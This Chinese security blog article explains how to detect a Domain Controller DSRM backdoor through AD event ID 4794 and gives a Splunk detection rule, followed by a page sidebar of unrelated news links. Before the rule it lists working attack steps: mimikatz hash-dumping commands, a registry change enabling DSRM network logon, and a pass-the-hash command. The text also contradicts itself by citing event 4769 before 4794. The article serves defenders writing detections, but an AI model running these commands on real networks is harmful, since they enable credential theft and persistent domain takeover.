基于AD Event日志实时检测DSRM后门
01、简介
(资料图片)
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
为您推荐
广告
随机阅读
- 基于AD Event日志实时检测DSRM后门
- 日本1月经常项目顺差同比增加16%
- 天天快看点丨《小龙人》中的4个孩子,唯一女生已嫁人,贝贝模样大变
- 拜登下令全面调查美国航空管理系统停摆事件
- 报道:北汽重卡发布企业战略:2023年销量目标1万辆
- 世界热资讯!2023春节开封哪里有庙会啊
- 56岁田震与吴琼聚餐,近况曝光老到认不出,眼袋明显身材出众
- 首批权益基金2022年四季报出炉 今年市场多个板块配置性价比高渐成共识
- 侵权责任是否应当赔偿间接损失
- 天天头条:大湖股份:公司未涉及数字经济领域的业务及服务
- 金奥博(002917)1月9日主力资金净卖出3093.65万元|今日热讯
- 【早知道】2023年对月销售额10万元以下的增值税小规模纳税人免征增值税;央行上海总部:推动上海房地产市场平稳健康发展
- 小赢卡贷逾期不还会怎样?会上门催收吗-环球速递
- 环球观焦点:借购消费贷贷款逾期17天拖欠多久会上征信
- 交通违章什么时候能去处理|全球视讯
- 人民网评:“五个一百”, 用主旋律奏响新征程的奋进乐章 当前快播
- 热门:益生股份:2023年益生909的产能约为八千多万只 正在准备扩建
- 天天观热点:城建发展:公司同业竞争问题正在逐步解决中
- 环球视讯!GAI & VaVa泰国演唱会悟空外卖独家预售开启!Let's Go Thailand!
- 【播资讯】4000亿护肤市场,对轻医美行业有何映射?
- 1通用汽车(GM)2022年在华市场零售销量逾230万辆 同比下降约21%_世界热资讯
- 2国资委:推动国有企业中长期激励扩面提质-百事通
- 32022年中欧班列(武汉)开行列数同比增长逾三成
- 42023年春节涪陵返乡隔离/核酸政策-世界热文
- 5两市融资余额增加16.73亿元 融资客交易活跃度上升
- 6全球速讯:通程控股1月5日开盘跌幅达5%
- 7浪潮信息发布开源操作系统Inspur KOS|环球报道
- 8刘銮雄记者会信息量大!激动辟谣乒乓球传闻,没接受甘比老母捐肾 天天速看
- 9合肥肥东县白龙中心卫生院发热门诊联系方式(附医保报销)
- 10全球最新:感染后一直咳嗽,该怎么选中药?感染者的同住人又该如何增强抵抗力,预防感染?权威回应来了【科学防疫小贴士】(79)
- 1每日视讯:2023年贵阳春节限行吗?(小客车/货车/特殊车型)
- 2速递!华研精机:1月3日获融资买入47.55万元,占当日流入资金比例5.47%
- 3中伊概念板块1月3日涨2.1%,合众思壮领涨,主力资金净流入5694.38万元 环球信息
- 42022宙斯奖遗珠:国承1号、吉利GeeTrace区块链、谛听视界…… 前沿热点
- 52023年1月4日广州黄埔消费券几点发放? 滚动
- 6IPO参考:环亚科技、银鹰新材冲刺创业板 绿控传动闯关科创板-报道
- 7【环球快播报】2023保定清苑区限行限号规定(限行时间+范围+尾号)
- 8端午节情感句子(精选516句)
- 9每日消息!2023年春节返乡火车/高铁购票日历
- 10复数怎么读 复数的释义
广告
财经
- 世界新动态:塔里木油田:2022年生产油气3310万吨 创历史新高
- 2023年1月1日全国铁路预计发送旅客470万人次
- 全球观察:春节摆什么贡果 过年家里一般摆什么贡果
- 女生阳后发现戴帽子的人变多了!遮一下没有洗的头发,还能保暖
- 《后西游记》的寓言 | 张怡微
- 锡装股份董秘回复:降膜蒸发器具有传热温差小、效率高、能耗低、稳定运行周期长和换热效率高等特点 全球热文
- 环球观焦点:融e贷逾期不还会影响个人征信吗
- 2022年,体育“科”代表与你的故事-天天热头条
- 2022石家庄公租房摇号结果公示时间
- 世界短讯!打击防范工作总结(优选19篇)
- 深振业A(000006)龙虎榜数据(12-29) 快资讯
- 2023年元旦春节崀山景区门票实行半价优惠 头条
- 消失17年后,55岁王祖贤近况曝光,判若两人:一代女神竟变成这样…
- 豆腐如何让保存时间长 豆腐怎么让保存时间长 世界速看料
- 舍不得放弃又不能拥有的句子精选309句|焦点信息
- 批准逮捕!海南一公司实际控制人非法侵占200万扶贫资金 天天信息
- 网贷逾期25天会对个人征信造成影响吗? 天天短讯
- 异动快报:华海药业(600521)12月28日10点0分触及涨停板|天天热点
- 范县气象局发布大雾橙色预警「II级/严重」「2022-12-27」
- 环球热消息:协和电子(605258.SH):股东曹良良近期减持12.01万股 持股降至5%以下